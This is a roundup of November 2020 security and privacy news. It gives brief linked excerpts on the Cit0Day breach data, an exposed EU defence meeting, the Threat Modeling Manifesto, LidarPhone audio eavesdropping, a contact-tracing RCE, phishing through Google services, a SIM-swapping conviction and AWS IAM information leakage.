Inside the Cit0Day Breach Collection
www.troyhunt.com/inside-the-cit0day-breach-collection/ It’s increasingly hard to know what to do with data like that from Cit0Day. If that’s an unfamiliar name to you, start with Catalin Cimpanu’s story on the demise of the service followed by the subsequent leaking of the data. . I was curious as to how much of this data had been seen in other breaches before and if there was an obvious trend.. Only 55% of the addresses in the sample set had been seen before (after loading the complete data set into HIBP, that number rose to 65%). There were a bunch of addresses in the Collection #1 incident and also in the 2,844 breach collection I added in Feb 2018, but clearly based on the red “null” results there were also many new addresses.
[translation] RTL Nieuws entered a secret EU defense consultation meeting
www.rtlnieuws.nl/nieuws/buitenland/artikel/5198276/rtl-nieuws-hack-defensie-ministers-europa-overleg-bijleveld RTL News has gained access to a secret consultation between the European defense ministers. This was possible because the Twitter account of Minister Ank Bijleveld briefly contained a photo with the login address and part of the pin code.
Security Pros Push for More Pervasive Threat Modeling
www.darkreading.com/application-security/security-pros-push-for-more-pervasive-threat-modeling/d/d-id/1339506 On Nov. 17, Miller and 14 other security professionals published the “Threat Modeling Manifesto,” a document spelling out the general principles of how best to consider attack vectors on software. As a blueprint, the document uses the style and content of the “Agile Manifesto,” a statement published by 17 developers nearly two decades ago that set out simple and elegant goals for agile software . developers. Manifesto at www.threatmodelingmanifesto.org/
YouTube, Facebook and Twitter align to fight Covid vaccine conspiracies
www.bbc.com/news/technology-55005385 Taking part in the effort alongside Facebook, Google-owned YouTube and Twitter are the UK’s Department for Digital, Culture, Media and Sport; the Reuters Institute for the Study of Journalism; Africa Check; Canada’s Privacy Council Office; and five other international fact-checking organisations.
Microsoft vows to pay users if it discloses their data following a government request that violates Europe’s privacy laws.
www.zdnet.com/article/microsoft-these-are-the-new-privacy-steps-were-taking-to-protect-your-data/ “Today, we’re announcing new protections for our public sector and enterprise customers who need to move their data from the European Union, including a contractual commitment to challenge government requests for data and a monetary commitment to show our conviction,” said [chief privacy officer] Brill.
How Cybercriminals Misuse and Abuse AI and ML
www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/exploiting-ai-how-cybercriminals-misuse-abuse-ai-and-ml We discuss the present state of the malicious uses and abuses of AI and ML and the plausible future scenarios in which cybercriminals might abuse these technologies for ill gain.. Paper at
Robot Vacuums Suck Up Sensitive Audio in LidarPhone Hack
threatpost.com/robot-vacuums-audio-lidarphone-hack/161421/ We develop a system to repurpose the LiDAR sensor to sense acoustic signals in the environment, remotely harvest the data from the cloud and process the raw signal to extract information. We call this eavesdropping system LidarPhone, said the team of researchers from the University of Maryland, College Park and the National University of Singapore, in Wednesday research.. Paper at
German COVID-19 Contact-Tracing Vulnerability Allowed RCE
threatpost.com/german-covid-19-contact-tracing-vulnerability-rce/161419/ There appeared to be a pre-authentication RCE vulnerability in Corona-Warn-App Server, which drives Germanys COVID-19 contact-tracing application infrastructure, according to Muñoz. This vulnerability had the potential to affect the integrity of Germanys COVID-19 response and as such warranted an immediate response from our team.
US Senate approves deepfake bill to defend against manipulated media
www.theregister.com/2020/11/19/us_senate_deepfake/ On Wednesday, proposed US legislation to fund defenses against realistic computer-generated media known as deepfakes was approved by the US Senate and the bill now awaits consideration in the US House of Representatives.
OK Google, Build Me a Phishing Campaign
www.armorblox.com/blog/ok-google-build-me-a-phishing-campaign/ The Armorblox threat research team has seen a sharp uptick in attackers using Google services to help them get emails past binary security filters based on keywords or URLs. In this blog, we will outline five targeted phishing campaigns that weaponize various Google services during their attack flow.
Convicted SIM Swapper Gets 3 Years in Jail
krebsonsecurity.com/2020/11/convicted-sim-swapper-gets-3-years-in-jail/ Conor Freeman of Dublin took part in the theft of more than two million dollars worth of cryptocurrency from different victims throughout 2018. Freeman was named as a member of a group of alleged SIM swappers called The Community charged last year with wire fraud in connection with SIM swapping attacks that netted in excess of $2.4 million.
F-Secure varoittaa yrityksiä uudesta huijauksesta Jos on liikevaihtoa ja rahaa tilillä, olette mahdollinen kiristyskohde
www.tivi.fi/uutiset/tv/7cc3c859-278f-413c-a3fd-ad1d21ecd43c Se on myös hyvä esimerkki tavasta, jolla on helppo huijata vastaanottajaa. Lähetetään aidolta Teams-viestiltä näyttävä sähköposti, jonka linkki viekin haittaohjelman luo, [F-Secure CISO Jukka] Seppänen varoittaa.
Microsoft really doesnt want you to run web browsers with elevated feature
www.windowslatest.com/2020/11/19/microsoft-doesnt-want-web-browsers-with-elevated-feature/ Microsoft will detect when the browser is running elevated in a scenario where executables can be run un-elevated. When detected, Microsoft wants to re-launch the browser through explorer.exe so the browser will run under the same user as the shell and de-elevation will take place.
Facebook offers up first-ever estimate of hate speech prevalence on its platform
www.reuters.com/article/us-facebook-content/facebook-estimates-hate-speech-seen-in-1-out-of-1000-views-on-its-platform-idUSKBN27Z2R0 Facebook Inc for the first time on Thursday disclosed numbers on the prevalence of hate speech on its platform, saying that out of every 10,000 content views in the third quarter, 10 to 11 included hate speech.
Information Leakage in AWS Resource-Based Policy APIs
unit42.paloaltonetworks.com/aws-resource-based-policy-apis/ Unit 42 researchers discovered a class of Amazon Web Services (AWS) APIs that can be abused to leak the AWS Identity and Access Management (IAM) users and roles in arbitrary accounts. Researchers confirmed that 22 APIs across 16 different AWS services could be abused the same way and the exploit works across all three AWS partitions (aws, aws-us-gov or aws-cn). AWS services that can be potentially . abused by attackers include Amazon Simple Storage Service (S3), Amazon Key Management Service (KMS) and Amazon Simple Queue Service (SQS). A malicious actor may obtain the roster of an account, learn the organizations internal structure and launch targeted attacks against individuals.